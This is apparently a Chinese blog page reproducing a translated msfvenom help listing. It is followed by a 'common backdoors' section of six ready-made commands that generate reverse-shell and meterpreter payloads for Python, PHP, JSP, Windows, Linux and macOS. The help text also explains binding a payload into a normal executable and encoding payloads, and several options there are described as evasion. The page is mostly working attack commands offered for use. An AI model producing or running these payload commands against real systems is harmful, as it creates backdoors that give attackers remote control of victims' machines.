官方帮助
-l, --list <type> 列出指定类型的所有模块 类型包括: payloads, encoders, nops, platforms, archs, formats, all
-p, --payload <payload> 指定需要使用的payload(有效载荷)(--list payloads得到payload列表,--list-options得到指定payload的参数) 如果需要使用自定义的payload,请使用'-'或者stdin指定
--list-options 列出指定payload的标准,高级和规避选项 例如:msfvenom -p generic/shell_bind_tcp --list-options 将列出shell_bind_tcp这个payload的各种选项信息
-f, --format <format> 指定输出格式(使用 --list formats 列出所有的格式)
-e, --encoding <encoder> 要使用的编码(使用 --list encoders 列出所有的编码) 用于编码加密
--smallest 使用所有可用的编码器生成尽可能小的有效负载
-a, --arch <arch> 指定payload的目标CPU架构(使用 --list archs 列出所有的CPU架构)
--platform <platform> 指定payload的目标操作系统平台(使用 --list platforms 列出所有的操作系统平台)
-o, --out <path> 将payload保存到文件中
-b, --bad-chars <list> 指定不使用的字符集 例如:不使用'\x00\xff'这两个字符
-n, --nopsled <length> 在payload上添加指定长度的nop指令
-s, --space <length> 设定payload的最大长度 即生成的文件大小
--encoder-space <length> 设定编码payload的最大长度(默认为-s的值)
-i, --iterations <count> 对payload进行编码的次数
-c, --add-code <path> 指定一个自己的win32 shellcode文件
-x, --template <path> 指定一个可执行程序 将payload捆绑其中
例如:原先有个正常文件normal.exe 通过此选项把payload捆绑到这个程序上面
-k, --keep 针对-x中的捆绑程序 将创建新线程执行payload 一般情况-x -k选项一起使用
-v, --var-name <value> 指定用于某些输出格式的自定义变量名称
-t, --timeout <second> 从STDIN读取有效负载时等待的秒数(默认为30, 0为禁用)
-h, --help 查看帮助
作者:彤彤学安全
链接:https://juejin.cn/post/7092029274781122597
来源:稀土掘金
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。常用后门
msfvenom -p python/meterpreter/reverse_tcp LHOST=主机IP LPORT=主机端口 -f raw -o shell.py
msfvenom -p php/meterpreter/reverse_tcp LHOST=主机IP LPORT=主机端口 -f raw -o shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=主机IP LPORT=主机端口 -f raw > exp.jsp
msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=主机IP LPORT=主机端口 -f exe -o backdoor.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=主机IP LPORT=主机端口 -f elf > shell.elf
msfvenom -p osx/x86/shell_reverse_tcp LHOST=主机IP LPORT=主机端口 -f macho > shell.macho
4752
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
